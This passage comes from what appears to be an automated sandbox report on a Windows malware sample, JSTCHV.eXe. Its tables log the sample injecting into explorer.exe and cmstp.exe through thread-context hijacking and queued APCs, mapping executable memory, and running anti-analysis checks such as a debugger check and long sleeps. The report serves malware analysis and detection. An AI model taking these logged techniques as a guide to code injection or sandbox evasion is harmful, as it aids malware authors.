| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Control Flow | #13: c:\users\aetadzjz\appdata\local\temp\jstchv.exe | 0x144 | os_tid = 0x348, address = 0x77e301c4 |
|
1 |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
2 | |
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | \??\C:\Windows\SysWOW64\cmstp.exe | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | \??\C:\Windows\SysWOW64\ntdll.dll | type = extended |
|
2 | |
| Get Info | \??\C:\Windows\SysWOW64\ntdll.dll | type = extended |
|
1 | |
| Get Info | \??\C:\Windows\SysWOW64\cmstp.exe | type = extended |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | \??\C:\Windows\SysWOW64\ntdll.dll | offset = 0, size = 1292096 |
|
1 | |
| Read | \??\C:\Windows\SysWOW64\cmstp.exe | offset = 0, size = 84992 |
|
1 |
Process (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\explorer.exe | type = PROCESS_WOW64_INFORMATION |
|
1 | |
| Get Info | c:\windows\explorer.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\windows\syswow64\cmstp.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmstp.exe | desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 |
Thread (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | os_tid = 0xb0 |
|
1 | |
| Suspend | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Get Context | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Queue APC | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Set Context | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Resume | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Resume | c:\windows\syswow64\wscript.exe | os_tid = 0xb0 |
|
1 |
Memory (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | c:\windows\explorer.exe | address = 0x2a63000, size = 680 |
|
1 | |
| Read | c:\windows\syswow64\cmstp.exe | address = 0x7efde008, size = 4 |
|
1 | |
| Read | c:\windows\syswow64\cmstp.exe | address = 0xd20000, size = 98304 |
|
1 |
Module (70)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | user32 | base_address = 0x77820000 |
|
2 | |
| Load | kernel32 | base_address = 0x76220000 |
|
22 | |
| Load | shell32 | base_address = 0x76b00000 |
|
1 | |
| Load | ntdll | base_address = 0x77e20000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
2 | |
| Get Handle | c:\users\aetadzjz\appdata\local\temp\jstchv.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsTNT, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x76235235 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EnumWindows, address_out = 0x7783d1cf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x76231856 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7623110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x762310ff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x76231b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x762311a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x7624d9b0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorPos, address_out = 0x77841218 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x76231410 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteW, address_out = 0x76b13c71 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x76231282 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnmapViewOfFile, address_out = 0x76231826 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x76233f5c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7624d802 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x762b45bf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessInternalW, address_out = 0x76243bf3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x7624d4dc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLongPathNameW, address_out = 0x7623a315 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x7623196e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x76233ed3 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtProtectVirtualMemory, address_out = 0x77e40028 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x76235223 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x762334d5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x76237a2f |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 38660808 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 38659052 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 38660808 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 38660824 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c0000 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x6600000 |
|
1 | |
| Map | - | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x29a0000 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x430000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x70000 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\local\temp\jstchv.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x460000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xd20000 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 790, y_out = 518 |
|
2 | |
| Sleep | duration = 2000 milliseconds (2.000 seconds) |
|
1 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Sleep | duration = 38658276 milliseconds (38658.276 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 218385 |
|
1 | |
| Get Time | type = Ticks, time = 220413 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
2 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | - |
|
1 | |
| Release | - |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Set Environment String | name = 598MPR44, value = C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe, environment = 0 |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\aetadzjz\appdata\local\temp\jstchv.exe | - |
|
1 |
Process #21: explorer.exe
61
16
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:48, Reason: Injection |
| Unmonitor | End Time: 00:04:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x39c |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9F8
0x
184
0x
314
0x
354
0x
324
0x
32C
0x
6D4
0x
6B0
0x
6A4
0x
4DC
0x
684
0x
658
0x
63C
0x
5B4
0x
588
0x
544
0x
540
0x
53C
0x
538
0x
528
0x
520
0x
51C
0x
518
0x
4DC
0x
430
0x
428
0x
420
0x
41C
0x
3D0
0x
3A0
0x
7F4
0x
5E0
0x
7F0
0x
418
0x
9C8
0x
888
0x
508
0x
60C
0x
7A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00300fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x01b3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b40000 | 0x01b40000 | 0x01f32fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001f40000 | 0x01f40000 | 0x0201efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x02035fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x02055fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002060000 | 0x02060000 | 0x02060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002070000 | 0x02070000 | 0x02071fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x02080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x020e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x020f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002100000 | 0x02100000 | 0x0217ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x021ebfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000021f0000 | 0x021f0000 | 0x021f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002200000 | 0x02200000 | 0x02201fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02290000 | 0x0255efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002560000 | 0x02560000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0265ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002660000 | 0x02660000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002760000 | 0x02760000 | 0x02761fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x02772fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002780000 | 0x02780000 | 0x02781fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002790000 | 0x02790000 | 0x02791fff | Pagefile Backed Memory | r |
|
|
|
- |
| actioncenter.dll.mui | 0x027a0000 | 0x027a4fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x027bffff | Private Memory | rwx |
|
|
|
- |
| comctl32.dll.mui | 0x027f0000 | 0x027f2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x02810fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002820000 | 0x02820000 | 0x02867fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x02873fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002890000 | 0x02890000 | 0x02890fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x0299ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000029a0000 | 0x029a0000 | 0x02abcfff | Pagefile Backed Memory | rwx |
|
|
|
- |
| index.dat | 0x02af0000 | 0x02afbfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02b00000 | 0x02b07fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02b10000 | 0x02b1ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002b20000 | 0x02b20000 | 0x02b20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| index.dat | 0x02b30000 | 0x02b3ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002ba0000 | 0x02ba0000 | 0x02ee2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ef0000 | 0x02ef0000 | 0x02f13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f20000 | 0x02f20000 | 0x02f28fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x02f37fff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02f40000 | 0x02f5ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002f60000 | 0x02f60000 | 0x02f60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x02f70000 | 0x02f73fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02f80000 | 0x02faffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x02fb0000 | 0x02fb3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002fc0000 | 0x02fc0000 | 0x0303ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003040000 | 0x03040000 | 0x03041fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x03053fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03063fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003070000 | 0x03070000 | 0x03070fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x03080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x03090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030a0000 | 0x030a0000 | 0x030a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x030b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000030c0000 | 0x030c0000 | 0x030c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x030d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030e0000 | 0x030e0000 | 0x030e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030f0000 | 0x030f0000 | 0x030f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x03100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x03110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003120000 | 0x03120000 | 0x0319ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x031a0000 | 0x03205fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x03290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x032a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032b0000 | 0x032b0000 | 0x032b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032c0000 | 0x032c0000 | 0x032c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x0334ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003350000 | 0x03350000 | 0x03350fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000003360000 | 0x03360000 | 0x03361fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x03370000 | 0x03373fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000003380000 | 0x03380000 | 0x03381fff | Pagefile Backed Memory | r |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x03390000 | 0x03390fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x033a0000 | 0x033a3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000033b0000 | 0x033b0000 | 0x033b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033c0000 | 0x033c0000 | 0x0343ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x03440000 | 0x03d6ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003d70000 | 0x03d70000 | 0x03d70fff | Private Memory | rw |
|
|
|
- |
| {0448dc77-1f74-49f5-ba7e-8de74fa55642}.2.ver0x0000000000000001.db | 0x03da0000 | 0x03da0fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x03db0000 | 0x03db3fff | Memory Mapped File | r |
|
|
|
- |
| {9d8c497c-611a-4408-acad-eadee99a69bf}.2.ver0x0000000000000001.db | 0x03dc0000 | 0x03dc0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03dd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003de0000 | 0x03de0000 | 0x03de0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000003e00000 | 0x03e00000 | 0x03e01fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000003e10000 | 0x03e10000 | 0x03e11fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003e20000 | 0x03e20000 | 0x03e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ec0000 | 0x03ec0000 | 0x03ecffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x03ed0000 | 0x03ed3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003ee0000 | 0x03ee0000 | 0x03ee0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f00000 | 0x03f00000 | 0x03f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f80000 | 0x03f80000 | 0x03f80fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000003fc0000 | 0x03fc0000 | 0x03fc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| wdmaud.drv.mui | 0x03fd0000 | 0x03fd0fff | Memory Mapped File | rw |
|
|
|
- |
| mmdevapi.dll.mui | 0x03fe0000 | 0x03fe0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000003ff0000 | 0x03ff0000 | 0x0403ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004040000 | 0x04040000 | 0x04041fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004050000 | 0x04050000 | 0x0405ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004060000 | 0x04060000 | 0x04060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004070000 | 0x04070000 | 0x04071fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004080000 | 0x04080000 | 0x04081fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004090000 | 0x04090000 | 0x04091fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000040a0000 | 0x040a0000 | 0x040a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000040d0000 | 0x040d0000 | 0x0414ffff | Private Memory | rw |
|
|
|
- |
| oleaccrc.dll | 0x04190000 | 0x04190fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000041d0000 | 0x041d0000 | 0x041d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000041e0000 | 0x041e0000 | 0x041e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| bthprops.cpl.mui | 0x04270000 | 0x04276fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000004280000 | 0x04280000 | 0x04281fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x0430ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004310000 | 0x04310000 | 0x04311fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004320000 | 0x04320000 | 0x0451ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004520000 | 0x04520000 | 0x04521fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004530000 | 0x04530000 | 0x045affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x0462ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004670000 | 0x04670000 | 0x046effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004760000 | 0x04760000 | 0x047dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047e0000 | 0x047e0000 | 0x0485ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004860000 | 0x04860000 | 0x04c62fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e70000 | 0x04e70000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005140000 | 0x05140000 | 0x051bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x052affff | Private Memory | rw |
|
|
|
- |
